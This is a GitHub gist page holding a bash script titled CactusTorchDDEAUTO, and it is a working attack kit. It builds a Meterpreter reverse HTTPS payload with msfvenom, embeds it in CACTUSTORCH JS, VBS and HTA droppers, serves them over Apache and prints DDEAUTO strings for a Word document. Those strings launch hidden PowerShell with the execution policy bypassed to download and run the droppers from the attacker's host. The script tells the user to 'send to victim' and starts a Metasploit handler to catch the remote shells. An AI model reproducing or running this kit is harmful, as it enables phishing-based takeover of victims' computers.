Last active
August 6, 2018 07:25
-
-
Save xillwillx/171c24c8e23512a891910824f506f563 to your computer and use it in GitHub Desktop.
CactusTorchDDEAUTO
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
git clone https://github.com/mdsecactivebreach/CACTUSTORCH.git && cd CACTUSTORCH | |
IP=`ip -4 addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'` | |
msfvenom -p windows/meterpreter/reverse_https LHOST=$IP LPORT=443 -f raw -o payload.bin | |
PAYLOAD=$(cat payload.bin | base64 -w 0) | |
sed -i -e 's|var code = ".*|var code = "'$PAYLOAD'";|' CACTUSTORCH.js | |
sed -i -e 's|Dim code : code = ".*|Dim code : code = "'$PAYLOAD'"|g' CACTUSTORCH.vbs | |
sed -i -e 's|Dim code : code = ".*|Dim code : code = "'$PAYLOAD'"|g' CACTUSTORCH.hta | |
cp -t /var/www/html/ CACTUSTORCH.vbs CACTUSTORCH.js CACTUSTORCH.hta | |
service apache2 start | |
echo -e "\n\n\n\nOpen Microsoft Word and press CTRL+F9 and copy any of the payloads below in between the { } then save and send to victim.\n\nJS PAYLOAD:\n\ | |
DDEAUTO c:\\\\\Windows\\\\\System32\\\\\\\cmd.exe \"/k powershell.exe -w hidden -nop -ep bypass -Command" \(new-object System.Net.WebClient\).DownloadFile\(\'http:\/\/$IP\/CACTUSTORCH.js\',\'index.js\'\)\; \& start c:\\\\\\Windows\\\\\\\System32\\\\\\\\cmd.exe \/c cscript.exe index.js\" >payloads.txt | |
echo -e "\nVBS PAYLOAD:\n\ | |
DDEAUTO c:\\\\\Windows\\\\\System32\\\\\\\cmd.exe \"/k powershell.exe -w hidden -nop -ep bypass -Command" \(new-object System.Net.WebClient\).DownloadFile\(\'http:\/\/$IP\/CACTUSTORCH.vbs\',\'index.vbs\'\)\; \& start c:\\\\\\Windows\\\\\\\System32\\\\\\\\cmd.exe \/c cscript.exe index.vbs\" >>payloads.txt | |
echo -e "\nHTA PAYLOAD:\n\ | |
DDEAUTO C:\\\\\Programs\\\\\Microsoft\\\\\Office\\\\\MSword.exe\\\\\..\\\\\..\\\\\..\\\\\..\\\\\windows\\\\\system32\\\\\mshta.exe \"http://$IP/CACTUSTORCH.hta\"" >>payloads.txt | |
clear | |
cat payloads.txt && rm payloads.txt | |
msfconsole -qx "use exploit/multi/handler;set payload windows/meterpreter/reverse_https;set LHOST '$IP';set LPORT 443; set ExitOnSession false; set EnableStageEncoding true; exploit -j -z" |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Newer script https://github.com/xillwillx/CACTUSTORCH_DDEAUTO